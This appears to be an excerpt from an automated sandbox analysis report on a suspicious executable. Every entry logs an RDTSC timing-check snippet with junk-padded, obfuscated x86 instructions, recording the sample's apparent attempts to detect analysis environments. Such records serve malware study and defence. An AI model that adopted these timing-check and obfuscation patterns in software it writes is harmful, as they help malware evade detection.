                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DC18 second address: 96DC1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CC5A second address: 96CD13 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBD3853A996h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ebx, dword ptr [ebp+122D3A52h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jng 00007FBD3853A9A5h 0x00000021 pushad 0x00000022 call 00007FBD3853A999h 0x00000027 pop edx 0x00000028 mov si, cx 0x0000002b popad 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 jbe 00007FBD3853A98Ah 0x00000039 mov di, 5E0Ah 0x0000003d mov eax, dword ptr [ebp+122D07B1h] 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007FBD3853A988h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FBD3853A98Bh 0x00000064 mov edi, dword ptr [ebp+122D3548h] 0x0000006a nop 0x0000006b jmp 00007FBD3853A990h 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 js 00007FBD3853A986h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CD13 second address: 96CD2A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D51Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CD2A second address: 96CD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970E15 second address: 970E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972EC2 second address: 972EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972EC6 second address: 972ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970EE4 second address: 970EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973EC2 second address: 973F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FBD38D4D518h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1245D086h] 0x0000002b push 00000000h 0x0000002d jng 00007FBD38D4D51Ch 0x00000033 add dword ptr [ebp+122D5987h], ecx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007FBD38D4D518h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 mov edi, dword ptr [ebp+122D29C5h] 0x0000005b mov ebx, dword ptr [ebp+122D3986h] 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FBD38D4D51Fh 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9766FB second address: 9766FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9766FF second address: 976705 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976705 second address: 976720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3853A98Ah 0x00000008 ja 00007FBD3853A986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A089 second address: 97A096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A096 second address: 97A0B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007FBD3853A991h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A0B8 second address: 97A0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D175 second address: 97D1BE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBD3853A98Eh 0x00000008 pop ecx 0x00000009 jmp 00007FBD3853A996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007FBD3853A998h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D59B second address: 97D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984B3E second address: 984B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jng 00007FBD3853A98Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984B65 second address: 984B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007FBD38D4D518h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBD38D4D527h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984B8E second address: 984B98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBD3853A98Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984CF4 second address: 984CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989C89 second address: 989C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988F6B second address: 988F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBD38D4D51Eh 0x0000000e jmp 00007FBD38D4D51Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988F8E second address: 988F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98951D second address: 989537 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D51Ch 0x0000000d jng 00007FBD38D4D516h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9897ED second address: 989809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBD3853A98Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBD3853A986h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989AE8 second address: 989AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CBA3 second address: 91CBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FBD3853A996h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B3D0 second address: 95B3D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B616 second address: 95B61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B61A second address: 95B620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B6E2 second address: 95B6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B6E8 second address: 95B6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B6EC second address: 95B736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 call 00007FBD3853A993h 0x0000000e cmc 0x0000000f pop ecx 0x00000010 mov edi, dword ptr [ebp+122D3982h] 0x00000016 nop 0x00000017 push ebx 0x00000018 pushad 0x00000019 jl 00007FBD3853A986h 0x0000001f jnl 00007FBD3853A986h 0x00000025 popad 0x00000026 pop ebx 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007FBD3853A990h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B736 second address: 95B73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B840 second address: 95B861 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBD3853A988h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FBD3853A98Bh 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B861 second address: 95B88B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD38D4D51Ch 0x00000008 jbe 00007FBD38D4D516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FBD38D4D520h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B88B second address: 95B898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FBD3853A986h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B898 second address: 95B89C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BD81 second address: 95BD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C12E second address: 95C1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBD38D4D51Ah 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FBD38D4D518h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jp 00007FBD38D4D519h 0x0000002e movsx ecx, bx 0x00000031 lea eax, dword ptr [ebp+12480CA4h] 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FBD38D4D518h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov edx, dword ptr [ebp+122D38C6h] 0x00000057 pushad 0x00000058 add ecx, dword ptr [ebp+122D2A61h] 0x0000005e add cx, 8199h 0x00000063 popad 0x00000064 nop 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1AB second address: 95C1AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1AF second address: 95C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D51Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1C6 second address: 95C1DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FBD3853A986h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1DC second address: 95C1E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C1E2 second address: 95C24E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD3853A995h 0x00000008 jne 00007FBD3853A986h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FBD3853A988h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov ecx, dword ptr [ebp+122D396Ah] 0x00000032 jmp 00007FBD3853A995h 0x00000037 lea eax, dword ptr [ebp+12480C60h] 0x0000003d movsx ecx, ax 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 pushad 0x00000045 popad 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C24E second address: 95C269 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FBD38D4D516h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBD38D4D51Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C269 second address: 95C26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C26D second address: 943F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 jns 00007FBD38D4D51Eh 0x0000000e call dword ptr [ebp+122D27FDh] 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F39E second address: 98F3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F3A2 second address: 98F3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F3A6 second address: 98F3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD3853A994h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98F3C4 second address: 98F3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FBE2 second address: 98FC15 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 jmp 00007FBD3853A992h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBD3853A997h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC15 second address: 98FC36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D521h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FBD38D4D51Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC36 second address: 98FC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923706 second address: 92370A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994C37 second address: 994C46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A6EE second address: 99A6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A6F4 second address: 99A6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9993B4 second address: 9993BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9993BF second address: 9993DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBD3853A992h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99965B second address: 99965F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997A0 second address: 9997A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997A6 second address: 9997AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997AA second address: 9997B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999A34 second address: 999A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 jmp 00007FBD38D4D524h 0x00000016 pushad 0x00000017 jnc 00007FBD38D4D516h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999A68 second address: 999A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A997h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A54B second address: 99A550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A550 second address: 99A568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A98Ah 0x00000009 jns 00007FBD3853A986h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998F9F second address: 998FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F0DC second address: 99F0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A98Dh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA9A second address: 99FA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA9E second address: 99FAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FBD8 second address: 99FBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FBDC second address: 99FBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4679 second address: 9A467D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A467D second address: 9A469C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3853A986h 0x00000008 jl 00007FBD3853A986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007FBD3853A986h 0x00000017 jno 00007FBD3853A986h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3969C second address: A396A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39DAD second address: A39DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39F58 second address: A39F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A991h 0x00000009 pop eax 0x0000000a jmp 00007FBD3853A996h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39F84 second address: A39F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D521h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A0D7 second address: A3A10D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBD3853A999h 0x0000000c jmp 00007FBD3853A98Bh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A10D second address: A3A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A111 second address: A3A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
